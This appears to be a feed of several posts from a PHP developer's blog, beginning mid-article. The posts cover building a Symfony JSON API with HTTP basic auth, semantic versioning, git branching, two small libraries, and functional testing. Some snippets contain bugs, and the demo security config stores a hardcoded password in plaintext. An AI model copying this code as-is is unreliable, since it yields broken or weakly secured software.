* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$name = $request->request->get('name');
if (null === $name) {
return new JsonResponse(array('error' => 'The "name" parameter is missing from the request\'s body'), 422);
}
$createdProfile = new Profile($name);
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Let's see:
php app/console doctrine:database:drop --force --env=test
make test
Note: Because our last test failed, the database hasn't been removed, so we need to do it manually.
Looks nice! Our endpoint should also fail when a profile with the same name already exist:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends PHPUnit_Framework_TestCase
{
private $app;
private $em;
protected function setUp()
{
$this->app = new \AppKernel('test', true);
$this->app->boot();
$this->em = $this->app->getContainer()->get('doctrine.orm.entity_manager');
$this->em->beginTransaction();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
public function testItFailsIfNameIsMissing()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('no-name' => ''));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(422, $response->getStatusCode(), $response->getContent());
}
public function testItFailsIfNameAlreadyExists()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Provençal le Gaulois'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$this->app->handle($request);
$response = $this->app->handle($request);
$this->assertSame(422, $response->getStatusCode(), $response->getContent());
}
protected function tearDown()
{
$this->em->rollback();
$this->em->close();
}
}
Our tests should be broken again:
make test
Another check can fix this awful situation:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$name = $request->request->get('name');
if (null === $name) {
return new JsonResponse(array('error' => 'The "name" parameter is missing from the request\'s body'), 422);
}
if (null !== $em->getRepository('AppBundle:Profile')->findOneByName($name)) {
return new JsonResponse(array('error' => 'The name "'.$name.'" is already taken'), 422);
}
$createdProfile = new Profile($name);
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Are we there yet?
php app/console doctrine:database:drop --force --env=test
make test
Yes we are. Here's our last commit for this time:
git add -A
git commit -m 'Added error checks'
Creating an endpoint with Symfony is pretty straighfoward: it all comes down to HTTP knowledge.
Our codebase is very small due to the simplicity of our examples, but in a real life application we'll need to add more complexity as new requirements appear.
The pragmatic approach is good for now, but at some point we'll need to refactor our code by creating some services, each with their specific responsibilities, to prevent our application from becoming a big ball of mud where everything is hard to read, impossible to test and expensive to change.
This will the subject of the next article.
]]>Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the second article of the series on managing Web Services in a Symfony environment. Have a look at the first one: 1. Introduction.
In this post we'll create an empty application and prepare it:
First of all, we need to create an empty Symfony application:
composer create-project symfony/framework-standard-edition ws
Note: Take the time to configure a MySQL database, we'll need it later.
Next we'll configure an Apache's virtual host (should be in /etc/apache2/sites-available/ws.conf):
<VirtualHost *:80>
ServerName ws.local
DocumentRoot /home/foobar/ws/web
ErrorLog "/home/foobar/ws/app/logs/apache_errors.log"
CustomLog "/home/foobar/ws/app/logs/apache_accesses.log" common
<Directory /home/foobar/ws/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Require all granted
Order allow,deny
allow from all
</Directory>
</VirtualHost>
Apache will require access to the logs and cache directories, as well as your
user. The easiest way to do so is to change Apache's user and group to yours in
/etc/apache2/envvars:
export APACHE_RUN_USER=foobar
export APACHE_RUN_GROUP=foobar
In order for this to work we'll update our /etc/hosts file:
echo '127.0.0.1 ws.local' | sudo tee -a /etc/hosts
And finally we'll restart the web server:
sudo service apache2 restart
We should be able to see "Homepage" when browsing http://ws.local/app_dev.php/app/example
Let's commit our work:
git init
git add -A
git ci -m 'Created a standard Symfony application'
As explained in this article, we'll twitch the standard edition a little bit in order to make tests more explicit.
First we create a bootstraping file:
<?php
// File: app/bootstrap.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
Then we configure PHPUnit to use it:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/4.1/en/appendixes.configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.1/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="bootstrap.php"
>
<testsuites>
<testsuite name="Project Test Suite">
<directory>../tests</directory>
</testsuite>
</testsuites>
</phpunit>
We've decided to put our tests in a separate tests directory, allowing us to
decalre an autoload mapping specific for development. To fully optimize our
autoloading, we'll also define our src/AppBundle folder as a path for the
AppBundle namespace, using PSR-4:
{
"name": "symfony/framework-standard-edition",
"license": "MIT",
"type": "project",
"description": "The \"Symfony Standard Edition\" distribution",
"autoload": {
"psr-4": { "AppBundle\\": "src/AppBundle" }
},
"autoload-dev": {
"psr-4": { "AppBundle\\Tests\\": "tests" }
},
"require": {
"php": ">=5.3.3",
"symfony/symfony": "2.6.*",
"doctrine/orm": "~2.2,>=2.2.3",
"doctrine/doctrine-bundle": "~1.2",
"twig/extensions": "~1.0",
"symfony/assetic-bundle": "~2.3",
"symfony/swiftmailer-bundle": "~2.3",
"symfony/monolog-bundle": "~2.4",
"sensio/distribution-bundle": "~3.0.12",
"sensio/framework-extra-bundle": "~3.0",
"incenteev/composer-parameter-handler": "~2.0"
},
"require-dev": {
"sensio/generator-bundle": "~2.3"
},
"scripts": {
"post-root-package-install": [
"SymfonyStandard\\Composer::hookRootPackageInstall"
],
"post-install-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles"
],
"post-update-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles"
]
},
"config": {
"bin-dir": "bin"
},
"extra": {
"symfony-app-dir": "app",
"symfony-web-dir": "web",
"symfony-assets-install": "relative",
"incenteev-parameters": {
"file": "app/config/parameters.yml"
},
"branch-alias": {
"dev-master": "2.6-dev"
}
}
}
To make it official, we need to run the following command:
composer dump-autoload
We'll also install phpspec:
composer require phpspec/phpspec:~2.1
With this our tests will be awesome! Time to commit:
git add -A
git commit -m 'Configured tests'
Symfony provides the posted data in the Request's request attribute, except
if the content type is application/json, as it will be our case. To fix this
behavior we'll follow the steps described in this article.
Let's start by the creation of an event listener:
<?php
// File: src/AppBundle/EventListener/SubmitJsonListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
/**
* PHP does not populate $_POST with the data submitted via a JSON Request,
* causing an empty $request->request.
*
* This listener fixes this.
*/
class SubmitJsonListener
{
/**
* @param GetResponseEvent $event
*/
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmited = in_array($request->getMethod(), array('POST', 'PUT'), true);
$isJson = ('application/json' === $request->headers->get('Content-Type'));
if (!$hasBeenSubmited || !$isJson) {
return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
$event->setResponse(new JsonResponse(array('error' => 'Invalid or malformed JSON'), 400));
}
$request->request->add($data ?: array());
}
}
Finally we'll register it in the Dependency Injection Container:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
HTTP basic authentication can be configured through the app/config/security.yml
file, as described in the official documentation.
In the end we should have something like this:
# app/config/security.yml
security:
encoders:
Symfony\Component\Security\Core\User\User: plaintext
providers:
in_memory:
memory:
users:
spanish_inquisition:
password: 'NobodyExpectsIt!'
roles:
- ROLE_USER
firewalls:
dev:
pattern: ^/(_(profiler|wdt)|css|images|js)/
security: false
default:
anonymous: ~
http_basic: ~
stateless: true
access_control:
- { path: /.*, roles: ROLE_USER }
Now to comply with our description we need to customize the error. We can do so using another event listener:
<?php
// File: src/AppBundle/EventListener/ForbiddenExceptionListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
use Symfony\Component\Security\Core\Exception\AccessDeniedException;
/**
* PHP does not populate $_POST with the data submitted via a JSON Request,
* causing an empty $request->request.
*
* This listener fixes this.
*/
class ForbiddenExceptionListener
{
/**
* @param GetResponseForExceptionEvent $event
*/
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof AccessDeniedException) {
return;
}
$error = 'The credentials are either missing or incorrect';
$event->setResponse(new JsonResponse(array('error' => $error), 403));
}
}
And to register it:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.forbidden_exception_listener:
class: AppBundle\EventListener\ForbiddenExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
Note: the Symfony Security event listener has a priority set to 0. In order for our listener to be executed, we need to set a higher one, like 10.
As you can see by browsing http://ws.local/app_dev.php/app/example, we now need
to provide the spanish_inquisition with the NobodyExpectsIt! password to
access the page.
This is enough for today, we'll commit our work:
git add -A
git commit -m 'Created custom event listeners'
Our application is now ready!
In the [next article](/2015/01/28/sf-ws-part-2-2-creation-pragmatic.html we'll create the first endpoint, the creation of profiles, using a pragmatic approach.
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
Welcome to this new series of articles on managing Web Services in a Symfony environment. Its purpose is to provide an example, it doesn't pretend to be the best solution and it requires you to know the basics of Symfony (if you know what a service is, you're good) and of web services (basically to know that they're a way to provide data remotely).
Spoiler alert: There won't be much Symfony specific code ;) .
In this post we'll describe the different endpoints of the (fake) web service which will be used as a reference thoughout the whole series:
The posted and returned resources will always be wrapped in a JSON object.
All endpoints require HTTP Basic Authentication with the following credentials:
spanish_inquisitionNobodyExpectsIt!If those credentials are missing or wrong (403 FORBIDDEN), it will return:
{
"error": "The credentials are either missing or incorrect"
}
POST http://ws.local/api/v1/profilesThe request body should be as follow:
{
"name": "Fawlty Tower"
}
In case of success (201 CREATED), it will return:
{
"id": 23,
"name": "Fawlty Tower"
}
If the request's body contains malformed JSON (400 BAD REQUEST), it will return:
{
"error": "Invalid or malformed JSON"
}
If the name parameter is missing from the request's body (422 UNPROCESSABLE ENTITY),
it will return:
{
"error": "The \"name\" parameter is missing from the request's body"
}
If the name already exists (422 UNPROCESSABLE ENTITY), it will return:
{
"error": "The name \"Provençal le Gaulois\" is already taken"
}
DELETE http://ws.local/api/v1/profiles/{id}This endpoint will always return an empty body (204 NO CONTENT).
So basically we can create and remove profiles, which have an identifier and a name.
In the next article we'll see how to build such web service.
]]>TL;DR: Links I tweeted during 2014
I've tweeted a lot of links in 2014, so in order to keep track of them I've decided to list them here:
Warning: The order and categories are quite random.
See also:
See also:
Interface suffix and Abstract prefix is nothing else than an acceptance of
your failure to name things clear in the first place. @everzetGenerators in Node.js: Common Misconceptions and Three Good Use Cases
Best resources about methodologies on Symfony, PHP, DDD, BDD ...
TL;DR: A library's public API can be: fully qualified class names, object's types, exceptions, method names and arguments.
When working on a project, every change made to it can possibly break its usage. Sometimes this is because we introduced a bug, but some other times this is because the project's usage needed to be changed.
Or did it?
In this article, we will discuss about semantic versioning, and public API.
In order to make the migration between two versions easier for users, we could use Semantic Versioning, which can be summed up as follow:
Given a version number MAJOR.MINOR.PATCH, increment the:
- MAJOR version when you make incompatible API changes
- MINOR version when you add functionality in a backwards-compatible manner
- PATCH version when you make backwards-compatible bug fixes
The trick is to define a "public API" (what the user actually use) and promise that we won't break it as long as we don't increment the MAJOR version.
The "public API" will vary between projects:
Let's focus on libraries.
When I started the Redaktilo library I had a lot of decisions to make:
I knew that I could make the wrong choices, which would mean changing names, types, arguments, etc. Basically, for the developers using the library it would mean breaking their code.
In order to avoid that as much as possible, I've decided to minimize the number
of classes the developers would use: a Text model and an Editor service.
Editor doesn't contain any logic, it relies on several "private" classes to do
the actual job. It's a Facade.
So my public API was the Gnugat\Redaktilo\Editor's fully qualified classname
(full namespace and the class name), and its methods (name and arguments).
Later on in the project we've introduced a version that didn't change the defined public API, but broke the projects that were using Redaktilo: the issue was that we added a new arguments in a private class's constructor.
Therefore the public API was extended to every constructors.
To fix the backward compatibility break, we made this new argument optional.
Some time passed and we've decided to re-organize the project's exceptions:
moving them to their own sub-namespace (Gnugat\Redaktilo\Exception)
and throwing only exceptions we owned.
But by doing so we could potentially break project's using our library.
Hence we extended the public API to exceptions.
To avoid backward compatible breaks we simply duplicated the exceptions: the new ones in the sub-namespace contain all the logic and inherit from the old exceptions to get their types.
Defining a public API doesn't mean we can't make changes to it:
Those changes will introduce deprecations that will be removed only when the MAJOR version is incremented.
This can be documented directly in the code, using phpdoc:
use @deprecated <since-version> <what to use instead>.
This can also be described in a migration documentation (e.g. UPGRADE-2.0.md).
Semantic versioning only applies to versions greater than 1.0.0: if you tag your project as
being in version 0.MINOR.PATCH you are allowed to break everything. But
remember that it will make your project very unstable, and people won't trust
it.
In theory you could break everything again when incrementing the MAJOR version (e.g. from version 1 to version 2), but this won't be appealing at all for people that already use your project. Try to make as few changes as possible, document them and give time to your users to stop using deprecated stuff.
Semantic versioning is a versioning methodology which has its perks and advantages. It gives high priority to user's experience, so you have to define a line between what should be used (public API) and what shouldn't (private).
Changes to the public API can be made by keeping the old stuff and document it as deprecated.
When creating a library, remember that exceptions and all constructors (even of private classes) are part of the public API.
]]>Note: Many thanks to Loïck Piera and his help, without him I'd still think that declaring a class as being part of the public API is sufficient.
TL;DR: Branch only from master, merge back when done and immediately deploy.
Git proposes a branch system with the possibility to merge them together, allowing you to separate released code from work in progress one.
Git flows have been created to help you keep the same process in your team. In this article, we'll have a look at @jbenet's simple git branching model:
mastermust always be deployable.- all changes are made through feature branches (pull-request + merge)
- rebase to avoid/resolve conflicts; merge in to
master
Changes can be new features, bug fixes, enhancements. They're all coming from master:
git checkout master
git checkout -b my-changes
Once you're happy with your branch, you need to update it with the last changes from master:
git checkout master
git pull --rebase
git checkout my-changes
git rebase master
git push -fu origin my-changes
Note:
rebasewill rewrite your commits, their dates will be changed (therefore their hash will be changed).
Check your tests, the coding standards and ask for a code review.
You can list conflicts (if any):
git status
Edit your files and then mark them as solved:
git add <file>
When all conflicted files have been resolved, you can continue:
git rebase --continue
Here's a to do list you can use to know if a branch is ready to be merged:
If everything is ok with your change, then you can merge it into master:
git checkout master
git merge --no-ff my-change
git push
git push origin :my-changes
git branch -D my-changes
It's now time to deploy! You can make a tag:
git tag -a <version>
git push --tags
Make small changes, release often.
]]>Deprecated: This article has been deprecated.
TL;DR: Konzolo can be used to create minimalistic CLI applications, or to implement the command design pattern.
After implementing a same feature in many projects, I usually have the reflex to create a library out of it. Konzolo is one of them :) .
In this article we'll see its features:
Let's create a "hello world" command:
<?php
namespace Acme\Demo\Command;
use Gnugat\Konzolo\Command;
use Gnugat\Konzolo\Input;
class HelloWorldCommand implements Command
{
public function execute(Input $input)
{
$name = $input->getArgument('name');
echo "Hello $name\n";
return Command::EXIT_SUCCESS;
}
}
Note: If the name argument is missing, an exception will be thrown. Keep reading to know more about those exceptions.
We only have to implement the execute method, which receives a convenient
Input class and returns 0 on success (actually this is optional).
Now that we have a command, let's put it in an application:
<?php
// File: console.php
use Acme\Demo\Command\HelloWorldCommand;
use Gnugat\Konzolo\Application;
use Gnugat\Konzolo\Input;
require __DIR__.'/vendor/autoload.php';
$input = new Input($argv[1]); // command name (acme:hello-world)
if (isset($argv[2])) {
$input->setArgument('name', $argv[2]);
}
$application = new Application();
$application->addCommand('acme:hello-world', new HelloWorldCommand());
$application->run($input);
You can then run it:
php console.php acme:hello-world Igor
If you need to validate the input, you can create a constraint:
<?php
namespace Acme\Demo\Validation;
use Gnugat\Konzolo\Exception\InvalidInputException;
use Gnugat\Konzolo\Input;
use Gnugat\Konzolo\Validation\InputConstraint;
class NoWorldNameConstraint implements InputConstraint
{
public function throwIfInvalid(Input $input)
{
$name = $input->getArgument('name');
if ('World' === $name) {
throw new InvalidInputException($input, 'The "name" parameter must not be set to "World"');
}
}
}
This constraint can be used directly in the command, as a dependency:
<?php
namespace Acme\Demo\Command;
use Acme\Demo\Validation\NoWorldNameConstraint;
use Gnugat\Konzolo\Command;
use Gnugat\Konzolo\Input;
class HelloWorldCommand implements Command
{
private $noWorldNameConstraint;
public function __construct(NoWorldNameConstraint $noWorldNameConstraint)
{
$this->noWorldNameConstraint = $noWorldNameConstraint;
}
public function execute(Input $input)
{
$this->noWorldNameConstraint->throwIfInvalid($input);
$name = $input->getArgument('name');
echo "Hello $name\n";
return Command::EXIT_SUCCESS;
}
}
And then inject it:
<?php
// File: console.php
use Acme\Demo\Command\HelloWorldCommand;
use Acme\Demo\Validation\NoWorldNameConstraint;
use Gnugat\Konzolo\Application;
use Gnugat\Konzolo\Input;
require __DIR__.'/vendor/autoload.php';
$input = new Input($argv[1]); // command name (acme:hello-world)
if (isset($argv[2])) {
$input->setArgument('name', $argv[2]);
}
$application = new Application();
$application->addCommand('acme:hello-world', new HelloWorldCommand(new NoWorldNameConstraint()));
$application->run($input);
More conveniently, the command can depend on a validator:
<?php
namespace Acme\Demo\Command;
use Gnugat\Konzolo\Command;
use Gnugat\Konzolo\Input;
use Gnugat\Konzolo\Validation\InputValidator;
class HelloWorldCommand implements Command
{
private $validator;
public function __construct(InputValidator $validator)
{
$this->validator = $validator;
}
public function execute(Input $input)
{
$this->validator->throwIfInvalid($input);
$name = $input->getArgument('name');
echo "Hello $name\n";
return Command::EXIT_SUCCESS;
}
}
You can add many constraint in a validator, and set priorities:
<?php
// File: console.php
use Acme\Demo\Command\HelloWorldCommand;
use Acme\Demo\Validation\NoWorldNameConstraint;
use Gnugat\Konzolo\Application;
use Gnugat\Konzolo\Input;
use Gnugat\Konzolo\Validation\InputValidator;
require __DIR__.'/vendor/autoload.php';
$input = new Input($argv[1]); // command name (acme:hello-world)
if (isset($argv[2])) {
$input->setArgument('name', $argv[2]);
}
$helloWorldValidator = new InputValidator();
$helloWorldValidator->addConstraint(new NoWorldNameConstraint(), 42);
$application = new Application();
$application->addCommand('acme:hello-world', new HelloWorldCommand($helloWorldValidator));
$application->run($input);
Note: The highest the priority, the soonest the constraint will be executed. For example, a constraint with priority 1337 will be executed before another one with priority 23 (even if this second one has been added first in the validator).
Konzolo's exceptions all implement the Gnugat\Konzolo\Exception\Exception interface.
This means you can catch every single one of them using this type. They also
extend at the standard \Exception class, so if you don't care about Konzolo
specific exceptions, you can catch them all!
This is usefull for example in Symfony2: you can create a Konzolo exception listener.
You can find more about the different kind of exceptions and their specific methods in its dedicated documentation.
We have seen how to create commands and validate their inputs.
Our examples showed how to create a CLI application, but Konzolo is mainly aimed at being used in applications (not only CLI ones). For example, Redaktilo uses internally a system of Command/CommandInvoker, using an array as input and sanitizer as a validation mechanism. All this logic can now be externalized, thanks to Konzolo!
I'd like to keep Konzolo as small as possible, but here's a list of possible features it could see in the future:
Currently we can find commands by their exact names. But wouldn't it be nice if we could just provide part of a name? Or an alias?
Creating input manually isn't always what we need. A factory that creates one from an array could improve the situation.
]]>TL;DR: Nomo Spaco finds a given project's PHP files, and read them to give you the available Fully Qualified ClassNames.
PHP provides the following function to find the declared classes of a project: get_declared_classes.
However this function only lists the classes which have been loaded (included/required) before its call: the usage of an autoloader breaks it (Composer for example).
In this article, we'll see how to solve this problem.
The first step is to find a way to get the Fully Qualified ClassName (fqcn) of a single class.
A solution would be to read in its source file: if the project follows the PSR-0 or PSR-4 standards, the file should only contain one class and its filename should be the same as the classname.
Let's create a function that retrieves the namespace declaration:
<?php
function _get_full_namespace($filename) {
$lines = file($filename);
$namespaceLine = array_shift(preg_grep('/^namespace /', $lines));
$match = array();
preg_match('/^namespace (.*);$/', $namespaceLine, $match);
$fullNamespace = array_pop($match);
return $fullNamespace;
}
Now let's create a function that chops down the filename to get the classname:
<?php
function _get_classname($filename) {
$directoriesAndFilename = explode('/', $filename);
$filename = array_pop($directoriesAndFilename);
$nameAndExtension = explode('.', $filename);
$className = array_shift($nameAndExtension);
return $className;
}
That was easy! To get the Fully Qualified ClassName from a filename we can simply call those two functions:
<?php
$fqcn = _get_full_namespace($filename).'\\'._get_class_name($filename);
The second step is to find the filenames of all the project's classes. Let's use the Symfony2 Finder Component:
<?php
use Symfony\Component\Finder\Finder;
require __DIR__.'/vendor/autoload.php';
function _get_filenames($path) {
$finderFiles = Finder::create()->files()->in($path)->name('*.php');
$filenames = array();
foreach ($finderFiles as $finderFile) {
$filenames[] $finderFiles->getRealpath();
}
return $filenames;
}
And that's it! We can now create a function which calls those three:
<?php
function get_all_fcqns($path) {
$filenames = _get_filenames($projectRoot);
$fcqns = array();
foreach ($filenames as $filename) {
$fcqns[] = _get_full_namespace($filename).'\\'._get_class_name($filename);
}
return $fcqns
}
It can simply be used like this:
<?php
$allFcqns = get_all_fcqns(__DIR__);
By finding all the PHP filenames in a project, and reading them to extract their namespace and classname, we can easily find all the all available Fully Qualified ClassNames.
The given functions are not meant to be used in production:
get_declared_classes())I've started a proof of concept: Nomo Spaco. Hopefully it will grow to be more efficient, safer and tested. But for now it provides you with a package, so you don't have to copy paste anything :) .
]]>TL;DR: Use IFTTT and Pocket to read tweets, blogs and stuff later (in a commute, in the loo, anywhere).
We often find interesting links on the web, but don't have time to read them immediately. This article will describe how to efficiently manage them so we can read them later.
Note: this is an actualization of an article wrote ten month ago.
We all have different strategies to "bookmark" links: actually bookmark them, favorite a tweet, subscribing to a RSS feed... The problem arises when we do all of those in the same time: wouldn't it be nice to have a single place to read them all?
We could use our emails for this: we check them often, we can archive them, favorite them or delete them. Inbox from Google makes the task even easier: we can snooze an email so it only appears at a given time, or a given location.
The problem is that it mixes "bookmarks" and "notifications": we could accidently ignore a business email by mistaking it with a "bookmark".
But don't panic! There's an application for this: Pocket (formerly "Read it later"). The advantage of Pocket is that you can install an extension in your browser so you can save a link or a tweet, and there's a mobile application which works offline, so you can read in the subway if you want.
Note: Pocket's ain page is the list of item to read, you can then favorite them, tag them, archive them or delete them.
The Pocket extension allows us to save manually links, but what about RSS feeds? What if we're used to favorite tweets (habits die hard)?
Well there's an application for this: If This Then That. Basically you can select one of the (many) supported triggers (RSS feed, tweet favoriting and others), then select one of the (many) supported actions (save to pocket, send an email and others).
All the tools are here! They're free of charge and they follow the philosophy "do one thing and do it well".
I personally store every links to read later in Pocket, either using the browser extension or with IFTTT using the following recipe templates:
I then read everyting in the subway (no network, but pocket preloads the items and keeps them available offline).
If you have trouble going back to Pocket, have a look at Muna: it should soon be able to send you a digested email of your Pocket's links to read, every morning.
I hope you enjoyed this article, tweet me your questions/comments if you have nay :) .
]]>TL;DR: Only check the status and exit code, don't use the given TestCase.
Provided that your controllers and commands are thin and they rely on services which are heavily unit tested, only checking the status and exit code in your functional test should be entirely sufficient.
Note: Checking at least the status and exit code is recommended by Symfony's Official Best Practices.
In this article, we will see how easy and quick it is to write them.
If you're familiar with Symfony2, you might use one of
the given KernelTestCase to write your tests with PHPUnit.
The whole purpose of this file is to create an instance of the application's Kernel, by guessing its localization. The problem with this approach is that it ties you to the PHPUnit test framework. If you have a look at its code, you'll also find it a bit complicated.
Note:
WebTestCasealso makes available a crawler, which we don't need as we only intend on checking the status code, not the body.
Let's take an easier way: we will create a bootstrap file which requires the kernel's file:
<?php
// File: app/bootstrap.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
Now all you need to do for your tests is to use this file. For example with PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
<!-- File: app/phpunit.xml.dist -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.3/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="./bootstrap.php"
>
<testsuites>
<testsuite name="Test Suite">
<directory>./src/AppBundle/Tests</directory>
</testsuite>
</testsuites>
</phpunit>
Now let's say we're testing the famous AcmeDemoBundle, and its hello world command:
<?php
namespace Acme\DemoBundle\Tests\Command;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Output\NullOutput;
use Symfony\Component\Console\Input\ArrayInput;
class HelloWorldCommandTest extends \PHPUnit_Framework_TestCase
{
private $app;
private $output;
protected function setUp()
{
$kernel = new \AppKernel('test', false);
$this->app = new Application($kernel);
$this->app->setAutoExit(false);
$this->output = new NullOutput();
}
public function testItRunsSuccessfully()
{
$input = new ArrayInput(array(
'commandName' => 'acme:hello',
'name' => 'Igor',
));
$exitCode = $this->app->run($input, $this->output);
$this->assertSame(0, $exitCode);
}
}
As you can see our test is neatly structured in 3 parts: input definition, the actual call and finally the check.
Note: the
setAutoExitmethod will ensure that the application doesn't call PHP'sexit. TheNullOutputensures that nothing is displayed.
Once again let's test AcmeDemoBundle, this time the demo controller:
<?php
namespace Acme\DemoBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class DemoControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
$this->app->boot();
}
public function testHomepage()
{
$request = new Request::create('/', 'GET');
$response = $this->app->handle($request);
$this->assertTrue($response->isSuccessful());
}
public function testItSaysHello()
{
$request = new Request('/hello/igor', 'GET');
$response = $this->app->handle($request);
$this->assertTrue($response->isSuccessful());
}
public function testItSendsEmail()
{
$request = new Request('/contact', 'POST', array(
'email' => 'igor@example.com',
'content' => 'Hello',
));
$response = $this->app->handle($request);
$this->assertTrue($response->isSuccessful());
}
}
Note: The
bootmethod makes the container available.
We stripped Symfony2 to its bare minimum and as a result we are now able to write functional tests without any effort.
I hope you enjoyed this article, please feel free to tweet me for any comment and question.
]]>TL;DR: Redaktilo is a library which wraps array manipulation to make it feel like using a text editor.
Six months ago, I talked about a silly library I was working on.
I've just released it's version 1.3, so I figured that maybe it's time to talk about it as the mature and usefull project it has become.
First, here's some meaningless figures:
In my two previous pet projects (GnugatWizardBundle and Fossil), as well as in professional projects, I've encountered the need to manipulate lines (from a file or a static string).
I've done 3 different implementations, each less reusable than the other, so I started to think that there was something to do here.
That's how Redaktilo is born!
My purpose was to create a single service which would be used as a text editor ("redaktilo" means "editor", in esperanto):
<?php
namespace Gnugat\Redaktilo;
class Editor
{
// Filesystem operations:
public function open($filename, $force = false);
public function save(File $file);
// Line selection
public function jumpAbove(Text $text, $pattern, $location = null);
public function jumpBelow(Text $text, $pattern, $location = null);
// Line detection
public function hasAbove(Text $text, $pattern, $location = null);
public function hasBelow(Text $text, $pattern, $location = null);
// Line manipulations
public function insertAbove(Text $text, $addition, $location = null);
public function insertBelow(Text $text, $addition, $location = null);
public function replace(Text $text, $replacement, $location = null);
public function replaceAll(Text $text, $pattern, $replacement);
public function remove(Text $text, $location = null);
// You can execute custom commands!
public function run($name, array $input);
}
This service is stateless, it manipulates the following model:
<?php
namespace Gnugat\Redaktilo;
class Text
{
public function getLines();
public function setLines(array $lines);
public function getLength();
public function getLineBreak();
public function setLineBreak($lineBreak);
public function getCurrentLineNumber();
public function setCurrentLineNumber($lineNumber);
public function getLine($lineNumber = null);
public function setLine($line, $lineNumber = null);
}
Note: The
Filemodel extendsTextand addsfilenamegetter and setter.
As you can see, everything is centered around a current line, but specifying
directly a line number is possible (that's the meaning of the $location
argument).
To be honest, Editor doesn't do anything, it just wraps some low level
services. Amongst those, we have:
SearchEngine: decides which SearchStrategy will be usedCommandInvoker: executes a CommandThose two are actually here to provide extension points: if you need to look for
a line with something else than a regular expression, you can create your own
SearchStrategy, register it in SearchEngine and it will be available
directly from the Editor!
